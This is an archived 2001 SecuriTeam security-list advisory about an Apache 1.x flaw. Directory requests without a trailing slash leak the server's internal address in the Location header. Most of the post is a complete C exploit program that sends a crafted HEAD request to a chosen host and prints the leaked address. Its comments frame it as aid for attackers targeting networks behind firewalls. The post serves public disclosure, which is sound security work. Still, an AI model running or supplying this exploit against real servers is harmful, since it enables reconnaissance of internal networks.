[EXPL] Exploit Code Released For the Apache Server Address Disclosure Vulnerability

From: support@securiteam.com
Date: 08/18/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] Exploit Code Released For the Apache Server Address Disclosure Vulnerability
Message-Id: <20010818152120.73998138C0@mail.der-keiler.de>
Date: Sat, 18 Aug 2001 17:21:20 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Exploit Code Released For the Apache Server Address Disclosure
Vulnerability
------------------------------------------------------------------------

SUMMARY

A security vulnerability in Apache web server results in the disclosure of
the server's internal address.

The problem occurs when a HTTP request containing a directory is submitted
to the server. If the directory does not contain a trailing '/' character,
the server returns a 3xx redirection error code indicating that further
action must be taken in order to fulfill the request. When this occurs, a
'Location' response-header containing the address of the server is
returned as part of the response.

In a situation where the request is redirected to the server behind a
firewall, this could lead to the disclosure of the server's internal
network address.

DETAILS

Vulnerable systems:
Apache Group Apache 1.3
Apache Group Apache 1.2
Apache Group Apache 1.0

Exploit code:
/* Exploit for the Apache Server Address Disclosure Vulnerability
**
** by: magnum
** magnum@fuckthat.org
** http://fuckthat.org
**
** A vulnerability has been discovered in Apache web server that may
** result in the disclosure of the server's address.
**
** The problem occurs when a HTTP request containing the URI of a
directory
** is submitted to the server. If the URI does not contain a trailing '/'
** character, the server returns a 3xx redirection error code indicating
that
** further action must be taken in order to fulfill the request. When this

** occurs, a 'Location' response-header containing the address of the
server
** is returned as part of the response.
**
** In a situation where the request is redirected to the server behind a
** firewall, this could lead to the disclosure of the server's internal
** network address.
**
** --SNIP--
**
** As it was put so well in that explanation, an attacker could exploit
this
** vulnerability to gain important information that could help you or an
** attacker to eventually compromise a network or server that resides
behind
** an ipchains/NAT firewall, routing firewall, or many other different
kinds
** of bastion hosts.
**
** Enjoy :)
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/time.h>
#define ERROR -1
#define MAXLEN 400
main(int argc, char *argv[])
{
int sock_fd;
struct sockaddr_in dest_addr;
struct hostent *he;
char buf[1024];
char request[1024];
char *p;
int i;
int jackmove;

if (argc != 4) {
printf("Usage: %s <hostname> <port> <directory>\n",argv[0]);
printf("Example(verbose): %s www.linux.org 80 /info\n",argv[0]);
printf("Example(specify): %s www.linux.org 80 /info | grep
Location\n",argv[0]);
printf("Example(output) : Location: http://127.0.0.3/supersecret***/\n");
exit(1);
}

if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */
printf("Unknown host.\n");
exit(1);
}

dest_addr.sin_family = AF_INET;
i = atoi(argv[2]);
dest_addr.sin_port = htons(i);
dest_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_addr.sin_zero), 8);

/* heh, sorry, no error checking */
if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Cannot open socket.\n");
exit(1);
}

if(connect(sock_fd, (struct sockaddr *)&dest_addr, sizeof(struct
sockaddr)) == -1) {
printf("Could not connect to socket.\n");
exit(1);
}

printf("Disclose - Exploit for the Apache Server Address Disclosure
Vulnerability\n");
printf("by: magnum - magnum@fuckthat.org - http://www.fuckthat.org\n\n");
strcat(request,"HEAD ");
strcat(request,argv[3]);
strcat(request," HTTP/1.0\n\n\n");
sleep(1);
send(sock_fd, request, strlen(request), 0);
printf("Status: ");
if((jackmove=recv(sock_fd, buf, MAXLEN, 0)) == ERROR) {
   printf("recv error\n");
        close(sock_fd);
  exit(1);
}

printf("Done.\n");
buf[jackmove] = '\0';
p=strstr(buf, "Location");
printf("%s\n", p);

close(sock_fd);
exit(0);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:magnum@fuckthat.org> Magnum
Johnson.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.